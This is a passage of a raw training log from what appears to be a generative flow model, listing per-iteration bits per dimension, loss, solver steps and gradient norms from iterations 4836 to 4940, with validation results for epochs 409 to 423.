1.0790(1.0843) | Error 0.0000(0.0000) Steps 434(436.31) | Grad Norm 0.1098(1.6865) | Total Time 10.00(10.00)\nIter 4836 | Time 40.1317(40.1922) | Bit/dim 1.0792(1.0842) | Xent 0.0000(0.0000) | Loss 1.0792(1.0842) | Error 0.0000(0.0000) Steps 440(436.42) | Grad Norm 0.2178(1.6424) | Total Time 10.00(10.00)\nIter 4837 | Time 40.6950(40.2073) | Bit/dim 1.0842(1.0842) | Xent 0.0000(0.0000) | Loss 1.0842(1.0842) | Error 0.0000(0.0000) Steps 434(436.35) | Grad Norm 0.3372(1.6033) | Total Time 10.00(10.00)\nIter 4838 | Time 40.5811(40.2185) | Bit/dim 1.0739(1.0839) | Xent 0.0000(0.0000) | Loss 1.0739(1.0839) | Error 0.0000(0.0000) Steps 434(436.28) | Grad Norm 0.2586(1.5629) | Total Time 10.00(10.00)\nIter 4839 | Time 40.2304(40.2188) | Bit/dim 1.0790(1.0837) | Xent 0.0000(0.0000) | Loss 1.0790(1.0837) | Error 0.0000(0.0000) Steps 440(436.39) | Grad Norm 0.2523(1.5236) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0409 | Time 14.9288, Epoch Time 307.7470(310.8403), Bit/dim 1.0745(best: 1.0741), Xent 0.0000, Loss 1.0745, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 4840 | Time 39.8148(40.2067) | Bit/dim 1.0777(1.0835) | Xent 0.0000(0.0000) | Loss 1.0777(1.0835) | Error 0.0000(0.0000) Steps 434(436.32) | Grad Norm 0.1572(1.4826) | Total Time 10.00(10.00)\nIter 4841 | Time 40.5097(40.2158) | Bit/dim 1.0800(1.0834) | Xent 0.0000(0.0000) | Loss 1.0800(1.0834) | Error 0.0000(0.0000) Steps 434(436.25) | Grad Norm 0.1077(1.4414) | Total Time 10.00(10.00)\nIter 4842 | Time 40.5360(40.2254) | Bit/dim 1.0753(1.0832) | Xent 0.0000(0.0000) | Loss 1.0753(1.0832) | Error 0.0000(0.0000) Steps 434(436.18) | Grad Norm 0.1316(1.4021) | Total Time 10.00(10.00)\nIter 4843 | Time 39.0637(40.1906) | Bit/dim 1.0791(1.0831) | Xent 0.0000(0.0000) | Loss 1.0791(1.0831) | Error 0.0000(0.0000) Steps 440(436.30) | Grad Norm 0.1527(1.3646) | Total Time 10.00(10.00)\nIter 4844 | Time 38.3394(40.1350) | Bit/dim 1.0832(1.0831) | Xent 0.0000(0.0000) | Loss 1.0832(1.0831) | Error 0.0000(0.0000) Steps 434(436.23) | Grad Norm 0.2166(1.3301) | Total Time 10.00(10.00)\nIter 4845 | Time 40.9562(40.1597) | Bit/dim 1.0819(1.0830) | Xent 0.0000(0.0000) | Loss 1.0819(1.0830) | Error 0.0000(0.0000) Steps 434(436.16) | Grad Norm 0.1468(1.2946) | Total Time 10.00(10.00)\nIter 4846 | Time 40.0346(40.1559) | Bit/dim 1.0745(1.0828) | Xent 0.0000(0.0000) | Loss 1.0745(1.0828) | Error 0.0000(0.0000) Steps 440(436.28) | Grad Norm 0.1419(1.2601) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0410 | Time 14.8357, Epoch Time 306.4589(310.7088), Bit/dim 1.0737(best: 1.0741), Xent 0.0000, Loss 1.0737, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 4847 | Time 38.5113(40.1066) | Bit/dim 1.0804(1.0827) | Xent 0.0000(0.0000) | Loss 1.0804(1.0827) | Error 0.0000(0.0000) Steps 434(436.21) | Grad Norm 0.0829(1.2247) | Total Time 10.00(10.00)\nIter 4848 | Time 38.7121(40.0647) | Bit/dim 1.0739(1.0824) | Xent 0.0000(0.0000) | Loss 1.0739(1.0824) | Error 0.0000(0.0000) Steps 434(436.14) | Grad Norm 0.1307(1.1919) | Total Time 10.00(10.00)\nIter 4849 | Time 38.5941(40.0206) | Bit/dim 1.0839(1.0825) | Xent 0.0000(0.0000) | Loss 1.0839(1.0825) | Error 0.0000(0.0000) Steps 434(436.08) | Grad Norm 0.2156(1.1626) | Total Time 10.00(10.00)\nIter 4850 | Time 38.7654(39.9830) | Bit/dim 1.0766(1.0823) | Xent 0.0000(0.0000) | Loss 1.0766(1.0823) | Error 0.0000(0.0000) Steps 434(436.01) | Grad Norm 0.1289(1.1316) | Total Time 10.00(10.00)\nIter 4851 | Time 39.3756(39.9647) | Bit/dim 1.0790(1.0822) | Xent 0.0000(0.0000) | Loss 1.0790(1.0822) | Error 0.0000(0.0000) Steps 434(435.95) | Grad Norm 0.1056(1.1008) | Total Time 10.00(10.00)\nIter 4852 | Time 38.6554(39.9255) | Bit/dim 1.0748(1.0820) | Xent 0.0000(0.0000) | Loss 1.0748(1.0820) | Error 0.0000(0.0000) Steps 434(435.90) | Grad Norm 0.0768(1.0701) | Total Time 10.00(10.00)\nIter 4853 | Time 39.0003(39.8977) | Bit/dim 1.0800(1.0819) | Xent 0.0000(0.0000) | Loss 1.0800(1.0819) | Error 0.0000(0.0000) Steps 434(435.84) | Grad Norm 0.0881(1.0407) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0411 | Time 14.8572, Epoch Time 298.8627(310.3535), Bit/dim 1.0735(best: 1.0737), Xent 0.0000, Loss 1.0735, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 4854 | Time 41.6287(39.9496) | Bit/dim 1.0756(1.0817) | Xent 0.0000(0.0000) | Loss 1.0756(1.0817) | Error 0.0000(0.0000) Steps 434(435.78) | Grad Norm 0.1051(1.0126) | Total Time 10.00(10.00)\nIter 4855 | Time 41.2137(39.9876) | Bit/dim 1.0796(1.0817) | Xent 0.0000(0.0000) | Loss 1.0796(1.0817) | Error 0.0000(0.0000) Steps 446(436.09) | Grad Norm 0.0794(0.9846) | Total Time 10.00(10.00)\nIter 4856 | Time 39.9362(39.9860) | Bit/dim 1.0800(1.0816) | Xent 0.0000(0.0000) | Loss 1.0800(1.0816) | Error 0.0000(0.0000) Steps 440(436.21) | Grad Norm 0.0682(0.9571) | Total Time 10.00(10.00)\nIter 4857 | Time 40.3402(39.9966) | Bit/dim 1.0801(1.0816) | Xent 0.0000(0.0000) | Loss 1.0801(1.0816) | Error 0.0000(0.0000) Steps 440(436.32) | Grad Norm 0.0736(0.9306) | Total Time 10.00(10.00)\nIter 4858 | Time 41.3752(40.0380) | Bit/dim 1.0784(1.0815) | Xent 0.0000(0.0000) | Loss 1.0784(1.0815) | Error 0.0000(0.0000) Steps 446(436.61) | Grad Norm 0.0777(0.9050) | Total Time 10.00(10.00)\nIter 4859 | Time 42.0590(40.0986) | Bit/dim 1.0790(1.0814) | Xent 0.0000(0.0000) | Loss 1.0790(1.0814) | Error 0.0000(0.0000) Steps 440(436.71) | Grad Norm 0.1269(0.8817) | Total Time 10.00(10.00)\nIter 4860 | Time 40.8472(40.1211) | Bit/dim 1.0768(1.0813) | Xent 0.0000(0.0000) | Loss 1.0768(1.0813) | Error 0.0000(0.0000) Steps 446(436.99) | Grad Norm 0.0888(0.8579) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0412 | Time 15.0717, Epoch Time 314.6308(310.4818), Bit/dim 1.0733(best: 1.0735), Xent 0.0000, Loss 1.0733, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 4861 | Time 41.1677(40.1525) | Bit/dim 1.0822(1.0813) | Xent 0.0000(0.0000) | Loss 1.0822(1.0813) | Error 0.0000(0.0000) Steps 440(437.08) | Grad Norm 0.0882(0.8348) | Total Time 10.00(10.00)\nIter 4862 | Time 40.4514(40.1614) | Bit/dim 1.0768(1.0812) | Xent 0.0000(0.0000) | Loss 1.0768(1.0812) | Error 0.0000(0.0000) Steps 440(437.17) | Grad Norm 0.0917(0.8125) | Total Time 10.00(10.00)\nIter 4863 | Time 40.2613(40.1644) | Bit/dim 1.0827(1.0812) | Xent 0.0000(0.0000) | Loss 1.0827(1.0812) | Error 0.0000(0.0000) Steps 440(437.25) | Grad Norm 0.1015(0.7912) | Total Time 10.00(10.00)\nIter 4864 | Time 40.0058(40.1597) | Bit/dim 1.0757(1.0810) | Xent 0.0000(0.0000) | Loss 1.0757(1.0810) | Error 0.0000(0.0000) Steps 440(437.34) | Grad Norm 0.0752(0.7697) | Total Time 10.00(10.00)\nIter 4865 | Time 40.6535(40.1745) | Bit/dim 1.0798(1.0810) | Xent 0.0000(0.0000) | Loss 1.0798(1.0810) | Error 0.0000(0.0000) Steps 446(437.60) | Grad Norm 0.0964(0.7495) | Total Time 10.00(10.00)\nIter 4866 | Time 39.5581(40.1560) | Bit/dim 1.0784(1.0809) | Xent 0.0000(0.0000) | Loss 1.0784(1.0809) | Error 0.0000(0.0000) Steps 446(437.85) | Grad Norm 0.0825(0.7295) | Total Time 10.00(10.00)\nIter 4867 | Time 39.1409(40.1256) | Bit/dim 1.0793(1.0809) | Xent 0.0000(0.0000) | Loss 1.0793(1.0809) | Error 0.0000(0.0000) Steps 446(438.09) | Grad Norm 0.0848(0.7101) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0413 | Time 14.9710, Epoch Time 308.8406(310.4325), Bit/dim 1.0736(best: 1.0733), Xent 0.0000, Loss 1.0736, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 4868 | Time 40.6075(40.1400) | Bit/dim 1.0780(1.0808) | Xent 0.0000(0.0000) | Loss 1.0780(1.0808) | Error 0.0000(0.0000) Steps 440(438.15) | Grad Norm 0.0851(0.6914) | Total Time 10.00(10.00)\nIter 4869 | Time 40.8120(40.1602) | Bit/dim 1.0748(1.0806) | Xent 0.0000(0.0000) | Loss 1.0748(1.0806) | Error 0.0000(0.0000) Steps 440(438.21) | Grad Norm 0.0689(0.6727) | Total Time 10.00(10.00)\nIter 4870 | Time 42.3632(40.2263) | Bit/dim 1.0781(1.0805) | Xent 0.0000(0.0000) | Loss 1.0781(1.0805) | Error 0.0000(0.0000) Steps 440(438.26) | Grad Norm 0.0717(0.6547) | Total Time 10.00(10.00)\nIter 4871 | Time 41.2408(40.2567) | Bit/dim 1.0768(1.0804) | Xent 0.0000(0.0000) | Loss 1.0768(1.0804) | Error 0.0000(0.0000) Steps 446(438.49) | Grad Norm 0.0930(0.6378) | Total Time 10.00(10.00)\nIter 4872 | Time 41.1675(40.2840) | Bit/dim 1.0786(1.0804) | Xent 0.0000(0.0000) | Loss 1.0786(1.0804) | Error 0.0000(0.0000) Steps 440(438.54) | Grad Norm 0.0785(0.6211) | Total Time 10.00(10.00)\nIter 4873 | Time 39.8955(40.2724) | Bit/dim 1.0814(1.0804) | Xent 0.0000(0.0000) | Loss 1.0814(1.0804) | Error 0.0000(0.0000) Steps 440(438.58) | Grad Norm 0.0865(0.6050) | Total Time 10.00(10.00)\nIter 4874 | Time 39.8011(40.2582) | Bit/dim 1.0814(1.0804) | Xent 0.0000(0.0000) | Loss 1.0814(1.0804) | Error 0.0000(0.0000) Steps 440(438.62) | Grad Norm 0.0697(0.5890) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0414 | Time 14.9479, Epoch Time 313.3308(310.5195), Bit/dim 1.0734(best: 1.0733), Xent 0.0000, Loss 1.0734, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 4875 | Time 38.9494(40.2190) | Bit/dim 1.0786(1.0804) | Xent 0.0000(0.0000) | Loss 1.0786(1.0804) | Error 0.0000(0.0000) Steps 440(438.66) | Grad Norm 0.1254(0.5750) | Total Time 10.00(10.00)\nIter 4876 | Time 40.2120(40.2188) | Bit/dim 1.0769(1.0803) | Xent 0.0000(0.0000) | Loss 1.0769(1.0803) | Error 0.0000(0.0000) Steps 440(438.70) | Grad Norm 0.0719(0.5600) | Total Time 10.00(10.00)\nIter 4877 | Time 40.7911(40.2359) | Bit/dim 1.0788(1.0802) | Xent 0.0000(0.0000) | Loss 1.0788(1.0802) | Error 0.0000(0.0000) Steps 446(438.92) | Grad Norm 0.0989(0.5461) | Total Time 10.00(10.00)\nIter 4878 | Time 40.7945(40.2527) | Bit/dim 1.0782(1.0802) | Xent 0.0000(0.0000) | Loss 1.0782(1.0802) | Error 0.0000(0.0000) Steps 440(438.96) | Grad Norm 0.0713(0.5319) | Total Time 10.00(10.00)\nIter 4879 | Time 41.5642(40.2920) | Bit/dim 1.0748(1.0800) | Xent 0.0000(0.0000) | Loss 1.0748(1.0800) | Error 0.0000(0.0000) Steps 440(438.99) | Grad Norm 0.0734(0.5181) | Total Time 10.00(10.00)\nIter 4880 | Time 40.6769(40.3036) | Bit/dim 1.0778(1.0799) | Xent 0.0000(0.0000) | Loss 1.0778(1.0799) | Error 0.0000(0.0000) Steps 440(439.02) | Grad Norm 0.0724(0.5048) | Total Time 10.00(10.00)\nIter 4881 | Time 38.9439(40.2628) | Bit/dim 1.0821(1.0800) | Xent 0.0000(0.0000) | Loss 1.0821(1.0800) | Error 0.0000(0.0000) Steps 440(439.05) | Grad Norm 0.0725(0.4918) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0415 | Time 14.8256, Epoch Time 309.1605(310.4787), Bit/dim 1.0736(best: 1.0733), Xent 0.0000, Loss 1.0736, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 4882 | Time 39.1178(40.2284) | Bit/dim 1.0764(1.0799) | Xent 0.0000(0.0000) | Loss 1.0764(1.0799) | Error 0.0000(0.0000) Steps 440(439.08) | Grad Norm 0.0697(0.4791) | Total Time 10.00(10.00)\nIter 4883 | Time 39.1144(40.1950) | Bit/dim 1.0773(1.0798) | Xent 0.0000(0.0000) | Loss 1.0773(1.0798) | Error 0.0000(0.0000) Steps 446(439.28) | Grad Norm 0.0738(0.4670) | Total Time 10.00(10.00)\nIter 4884 | Time 41.1465(40.2236) | Bit/dim 1.0831(1.0799) | Xent 0.0000(0.0000) | Loss 1.0831(1.0799) | Error 0.0000(0.0000) Steps 440(439.31) | Grad Norm 0.0753(0.4552) | Total Time 10.00(10.00)\nIter 4885 | Time 41.3166(40.2563) | Bit/dim 1.0810(1.0800) | Xent 0.0000(0.0000) | Loss 1.0810(1.0800) | Error 0.0000(0.0000) Steps 440(439.33) | Grad Norm 0.0765(0.4439) | Total Time 10.00(10.00)\nIter 4886 | Time 41.4730(40.2928) | Bit/dim 1.0789(1.0799) | Xent 0.0000(0.0000) | Loss 1.0789(1.0799) | Error 0.0000(0.0000) Steps 440(439.35) | Grad Norm 0.0723(0.4327) | Total Time 10.00(10.00)\nIter 4887 | Time 39.7637(40.2770) | Bit/dim 1.0756(1.0798) | Xent 0.0000(0.0000) | Loss 1.0756(1.0798) | Error 0.0000(0.0000) Steps 446(439.55) | Grad Norm 0.0895(0.4224) | Total Time 10.00(10.00)\nIter 4888 | Time 42.0389(40.3298) | Bit/dim 1.0782(1.0797) | Xent 0.0000(0.0000) | Loss 1.0782(1.0797) | Error 0.0000(0.0000) Steps 440(439.56) | Grad Norm 0.0915(0.4125) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0416 | Time 14.7566, Epoch Time 311.0657(310.4963), Bit/dim 1.0734(best: 1.0733), Xent 0.0000, Loss 1.0734, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 4889 | Time 39.8697(40.3160) | Bit/dim 1.0788(1.0797) | Xent 0.0000(0.0000) | Loss 1.0788(1.0797) | Error 0.0000(0.0000) Steps 440(439.57) | Grad Norm 0.0679(0.4021) | Total Time 10.00(10.00)\nIter 4890 | Time 39.5541(40.2932) | Bit/dim 1.0808(1.0797) | Xent 0.0000(0.0000) | Loss 1.0808(1.0797) | Error 0.0000(0.0000) Steps 446(439.77) | Grad Norm 0.0679(0.3921) | Total Time 10.00(10.00)\nIter 4891 | Time 38.7626(40.2473) | Bit/dim 1.0786(1.0797) | Xent 0.0000(0.0000) | Loss 1.0786(1.0797) | Error 0.0000(0.0000) Steps 440(439.77) | Grad Norm 0.0722(0.3825) | Total Time 10.00(10.00)\nIter 4892 | Time 40.0464(40.2412) | Bit/dim 1.0767(1.0796) | Xent 0.0000(0.0000) | Loss 1.0767(1.0796) | Error 0.0000(0.0000) Steps 440(439.78) | Grad Norm 0.0741(0.3733) | Total Time 10.00(10.00)\nIter 4893 | Time 42.1573(40.2987) | Bit/dim 1.0787(1.0796) | Xent 0.0000(0.0000) | Loss 1.0787(1.0796) | Error 0.0000(0.0000) Steps 440(439.79) | Grad Norm 0.0692(0.3641) | Total Time 10.00(10.00)\nIter 4894 | Time 40.1758(40.2950) | Bit/dim 1.0755(1.0795) | Xent 0.0000(0.0000) | Loss 1.0755(1.0795) | Error 0.0000(0.0000) Steps 440(439.79) | Grad Norm 0.0785(0.3556) | Total Time 10.00(10.00)\nIter 4895 | Time 41.5665(40.3332) | Bit/dim 1.0784(1.0794) | Xent 0.0000(0.0000) | Loss 1.0784(1.0794) | Error 0.0000(0.0000) Steps 446(439.98) | Grad Norm 0.0844(0.3474) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0417 | Time 15.0511, Epoch Time 309.6450(310.4708), Bit/dim 1.0734(best: 1.0733), Xent 0.0000, Loss 1.0734, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 4896 | Time 40.0212(40.3238) | Bit/dim 1.0749(1.0793) | Xent 0.0000(0.0000) | Loss 1.0749(1.0793) | Error 0.0000(0.0000) Steps 440(439.98) | Grad Norm 0.0839(0.3395) | Total Time 10.00(10.00)\nIter 4897 | Time 40.8994(40.3411) | Bit/dim 1.0769(1.0792) | Xent 0.0000(0.0000) | Loss 1.0769(1.0792) | Error 0.0000(0.0000) Steps 440(439.98) | Grad Norm 0.0762(0.3316) | Total Time 10.00(10.00)\nIter 4898 | Time 42.7772(40.4142) | Bit/dim 1.0780(1.0792) | Xent 0.0000(0.0000) | Loss 1.0780(1.0792) | Error 0.0000(0.0000) Steps 440(439.98) | Grad Norm 0.0678(0.3237) | Total Time 10.00(10.00)\nIter 4899 | Time 40.7794(40.4251) | Bit/dim 1.0785(1.0792) | Xent 0.0000(0.0000) | Loss 1.0785(1.0792) | Error 0.0000(0.0000) Steps 440(439.98) | Grad Norm 0.0724(0.3162) | Total Time 10.00(10.00)\nIter 4900 | Time 40.5026(40.4274) | Bit/dim 1.0813(1.0792) | Xent 0.0000(0.0000) | Loss 1.0813(1.0792) | Error 0.0000(0.0000) Steps 440(439.98) | Grad Norm 0.0757(0.3090) | Total Time 10.00(10.00)\nIter 4901 | Time 40.6564(40.4343) | Bit/dim 1.0821(1.0793) | Xent 0.0000(0.0000) | Loss 1.0821(1.0793) | Error 0.0000(0.0000) Steps 446(440.16) | Grad Norm 0.0672(0.3017) | Total Time 10.00(10.00)\nIter 4902 | Time 41.1618(40.4561) | Bit/dim 1.0793(1.0793) | Xent 0.0000(0.0000) | Loss 1.0793(1.0793) | Error 0.0000(0.0000) Steps 440(440.16) | Grad Norm 0.0743(0.2949) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0418 | Time 14.9088, Epoch Time 313.9535(310.5753), Bit/dim 1.0735(best: 1.0733), Xent 0.0000, Loss 1.0735, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 4903 | Time 38.7961(40.4063) | Bit/dim 1.0808(1.0794) | Xent 0.0000(0.0000) | Loss 1.0808(1.0794) | Error 0.0000(0.0000) Steps 440(440.15) | Grad Norm 0.0663(0.2880) | Total Time 10.00(10.00)\nIter 4904 | Time 39.7537(40.3868) | Bit/dim 1.0756(1.0793) | Xent 0.0000(0.0000) | Loss 1.0756(1.0793) | Error 0.0000(0.0000) Steps 446(440.33) | Grad Norm 0.0731(0.2816) | Total Time 10.00(10.00)\nIter 4905 | Time 40.3962(40.3870) | Bit/dim 1.0837(1.0794) | Xent 0.0000(0.0000) | Loss 1.0837(1.0794) | Error 0.0000(0.0000) Steps 446(440.50) | Grad Norm 0.0891(0.2758) | Total Time 10.00(10.00)\nIter 4906 | Time 41.6369(40.4245) | Bit/dim 1.0746(1.0792) | Xent 0.0000(0.0000) | Loss 1.0746(1.0792) | Error 0.0000(0.0000) Steps 446(440.66) | Grad Norm 0.0623(0.2694) | Total Time 10.00(10.00)\nIter 4907 | Time 39.5570(40.3985) | Bit/dim 1.0787(1.0792) | Xent 0.0000(0.0000) | Loss 1.0787(1.0792) | Error 0.0000(0.0000) Steps 440(440.64) | Grad Norm 0.0677(0.2634) | Total Time 10.00(10.00)\nIter 4908 | Time 40.2368(40.3937) | Bit/dim 1.0815(1.0793) | Xent 0.0000(0.0000) | Loss 1.0815(1.0793) | Error 0.0000(0.0000) Steps 440(440.62) | Grad Norm 0.1117(0.2588) | Total Time 10.00(10.00)\nIter 4909 | Time 40.2338(40.3889) | Bit/dim 1.0743(1.0791) | Xent 0.0000(0.0000) | Loss 1.0743(1.0791) | Error 0.0000(0.0000) Steps 440(440.61) | Grad Norm 0.0698(0.2531) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0419 | Time 15.0042, Epoch Time 308.0325(310.4990), Bit/dim 1.0731(best: 1.0733), Xent 0.0000, Loss 1.0731, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 4910 | Time 39.2336(40.3542) | Bit/dim 1.0785(1.0791) | Xent 0.0000(0.0000) | Loss 1.0785(1.0791) | Error 0.0000(0.0000) Steps 440(440.59) | Grad Norm 0.0710(0.2477) | Total Time 10.00(10.00)\nIter 4911 | Time 40.9451(40.3719) | Bit/dim 1.0736(1.0790) | Xent 0.0000(0.0000) | Loss 1.0736(1.0790) | Error 0.0000(0.0000) Steps 446(440.75) | Grad Norm 0.0620(0.2421) | Total Time 10.00(10.00)\nIter 4912 | Time 39.0039(40.3309) | Bit/dim 1.0778(1.0789) | Xent 0.0000(0.0000) | Loss 1.0778(1.0789) | Error 0.0000(0.0000) Steps 440(440.73) | Grad Norm 0.0856(0.2374) | Total Time 10.00(10.00)\nIter 4913 | Time 38.8846(40.2875) | Bit/dim 1.0789(1.0789) | Xent 0.0000(0.0000) | Loss 1.0789(1.0789) | Error 0.0000(0.0000) Steps 446(440.89) | Grad Norm 0.0946(0.2331) | Total Time 10.00(10.00)\nIter 4914 | Time 39.3752(40.2601) | Bit/dim 1.0814(1.0790) | Xent 0.0000(0.0000) | Loss 1.0814(1.0790) | Error 0.0000(0.0000) Steps 440(440.86) | Grad Norm 0.0827(0.2286) | Total Time 10.00(10.00)\nIter 4915 | Time 40.8103(40.2766) | Bit/dim 1.0770(1.0789) | Xent 0.0000(0.0000) | Loss 1.0770(1.0789) | Error 0.0000(0.0000) Steps 440(440.83) | Grad Norm 0.0701(0.2239) | Total Time 10.00(10.00)\nIter 4916 | Time 40.1933(40.2741) | Bit/dim 1.0775(1.0789) | Xent 0.0000(0.0000) | Loss 1.0775(1.0789) | Error 0.0000(0.0000) Steps 440(440.81) | Grad Norm 0.0807(0.2196) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0420 | Time 14.8310, Epoch Time 305.7885(310.3577), Bit/dim 1.0723(best: 1.0731), Xent 0.0000, Loss 1.0723, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 4917 | Time 41.5883(40.3136) | Bit/dim 1.0810(1.0790) | Xent 0.0000(0.0000) | Loss 1.0810(1.0790) | Error 0.0000(0.0000) Steps 440(440.78) | Grad Norm 0.0659(0.2150) | Total Time 10.00(10.00)\nIter 4918 | Time 39.1101(40.2775) | Bit/dim 1.0742(1.0788) | Xent 0.0000(0.0000) | Loss 1.0742(1.0788) | Error 0.0000(0.0000) Steps 446(440.94) | Grad Norm 0.1531(0.2131) | Total Time 10.00(10.00)\nIter 4919 | Time 40.9059(40.2963) | Bit/dim 1.0793(1.0788) | Xent 0.0000(0.0000) | Loss 1.0793(1.0788) | Error 0.0000(0.0000) Steps 446(441.09) | Grad Norm 0.0681(0.2087) | Total Time 10.00(10.00)\nIter 4920 | Time 40.5543(40.3041) | Bit/dim 1.0779(1.0788) | Xent 0.0000(0.0000) | Loss 1.0779(1.0788) | Error 0.0000(0.0000) Steps 446(441.24) | Grad Norm 0.0699(0.2046) | Total Time 10.00(10.00)\nIter 4921 | Time 41.2943(40.3338) | Bit/dim 1.0796(1.0788) | Xent 0.0000(0.0000) | Loss 1.0796(1.0788) | Error 0.0000(0.0000) Steps 440(441.20) | Grad Norm 0.0675(0.2005) | Total Time 10.00(10.00)\nIter 4922 | Time 39.4216(40.3064) | Bit/dim 1.0783(1.0788) | Xent 0.0000(0.0000) | Loss 1.0783(1.0788) | Error 0.0000(0.0000) Steps 440(441.17) | Grad Norm 0.0878(0.1971) | Total Time 10.00(10.00)\nIter 4923 | Time 40.8232(40.3219) | Bit/dim 1.0788(1.0788) | Xent 0.0000(0.0000) | Loss 1.0788(1.0788) | Error 0.0000(0.0000) Steps 440(441.13) | Grad Norm 0.1160(0.1947) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0421 | Time 14.8776, Epoch Time 310.9442(310.3753), Bit/dim 1.0727(best: 1.0723), Xent 0.0000, Loss 1.0727, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 4924 | Time 42.7226(40.3939) | Bit/dim 1.0778(1.0788) | Xent 0.0000(0.0000) | Loss 1.0778(1.0788) | Error 0.0000(0.0000) Steps 446(441.28) | Grad Norm 0.1227(0.1925) | Total Time 10.00(10.00)\nIter 4925 | Time 40.0208(40.3827) | Bit/dim 1.0741(1.0786) | Xent 0.0000(0.0000) | Loss 1.0741(1.0786) | Error 0.0000(0.0000) Steps 440(441.24) | Grad Norm 0.0753(0.1890) | Total Time 10.00(10.00)\nIter 4926 | Time 38.7139(40.3327) | Bit/dim 1.0790(1.0787) | Xent 0.0000(0.0000) | Loss 1.0790(1.0787) | Error 0.0000(0.0000) Steps 440(441.20) | Grad Norm 0.0666(0.1853) | Total Time 10.00(10.00)\nIter 4927 | Time 39.9767(40.3220) | Bit/dim 1.0775(1.0786) | Xent 0.0000(0.0000) | Loss 1.0775(1.0786) | Error 0.0000(0.0000) Steps 440(441.17) | Grad Norm 0.1129(0.1831) | Total Time 10.00(10.00)\nIter 4928 | Time 40.3215(40.3220) | Bit/dim 1.0817(1.0787) | Xent 0.0000(0.0000) | Loss 1.0817(1.0787) | Error 0.0000(0.0000) Steps 446(441.31) | Grad Norm 0.1319(0.1816) | Total Time 10.00(10.00)\nIter 4929 | Time 40.7265(40.3341) | Bit/dim 1.0783(1.0787) | Xent 0.0000(0.0000) | Loss 1.0783(1.0787) | Error 0.0000(0.0000) Steps 440(441.27) | Grad Norm 0.0590(0.1779) | Total Time 10.00(10.00)\nIter 4930 | Time 39.3133(40.3035) | Bit/dim 1.0777(1.0787) | Xent 0.0000(0.0000) | Loss 1.0777(1.0787) | Error 0.0000(0.0000) Steps 440(441.23) | Grad Norm 0.0694(0.1747) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0422 | Time 14.8946, Epoch Time 309.3321(310.3440), Bit/dim 1.0734(best: 1.0723), Xent 0.0000, Loss 1.0734, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 4931 | Time 40.4565(40.3081) | Bit/dim 1.0764(1.0786) | Xent 0.0000(0.0000) | Loss 1.0764(1.0786) | Error 0.0000(0.0000) Steps 446(441.38) | Grad Norm 0.0669(0.1714) | Total Time 10.00(10.00)\nIter 4932 | Time 39.7922(40.2926) | Bit/dim 1.0738(1.0785) | Xent 0.0000(0.0000) | Loss 1.0738(1.0785) | Error 0.0000(0.0000) Steps 440(441.33) | Grad Norm 0.0713(0.1684) | Total Time 10.00(10.00)\nIter 4933 | Time 38.9969(40.2537) | Bit/dim 1.0790(1.0785) | Xent 0.0000(0.0000) | Loss 1.0790(1.0785) | Error 0.0000(0.0000) Steps 440(441.29) | Grad Norm 0.0678(0.1654) | Total Time 10.00(10.00)\nIter 4934 | Time 40.3258(40.2559) | Bit/dim 1.0787(1.0785) | Xent 0.0000(0.0000) | Loss 1.0787(1.0785) | Error 0.0000(0.0000) Steps 440(441.26) | Grad Norm 0.0980(0.1634) | Total Time 10.00(10.00)\nIter 4935 | Time 39.0451(40.2196) | Bit/dim 1.0840(1.0786) | Xent 0.0000(0.0000) | Loss 1.0840(1.0786) | Error 0.0000(0.0000) Steps 440(441.22) | Grad Norm 0.1243(0.1622) | Total Time 10.00(10.00)\nIter 4936 | Time 40.4841(40.2275) | Bit/dim 1.0828(1.0788) | Xent 0.0000(0.0000) | Loss 1.0828(1.0788) | Error 0.0000(0.0000) Steps 440(441.18) | Grad Norm 0.0661(0.1593) | Total Time 10.00(10.00)\nIter 4937 | Time 40.5060(40.2359) | Bit/dim 1.0767(1.0787) | Xent 0.0000(0.0000) | Loss 1.0767(1.0787) | Error 0.0000(0.0000) Steps 440(441.15) | Grad Norm 0.0613(0.1564) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0423 | Time 14.9450, Epoch Time 307.2233(310.2503), Bit/dim 1.0724(best: 1.0723), Xent 0.0000, Loss 1.0724, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 4938 | Time 39.7073(40.2200) | Bit/dim 1.0772(1.0787) | Xent 0.0000(0.0000) | Loss 1.0772(1.0787) | Error 0.0000(0.0000) Steps 440(441.11) | Grad Norm 0.0596(0.1535) | Total Time 10.00(10.00)\nIter 4939 | Time 39.8234(40.2081) | Bit/dim 1.0773(1.0786) | Xent 0.0000(0.0000) | Loss 1.0773(1.0786) | Error 0.0000(0.0000) Steps 446(441.26) | Grad Norm 0.0715(0.1510) | Total Time 10.00(10.00)\nIter 4940 | Time 40.0992(40.2048) | Bit/dim 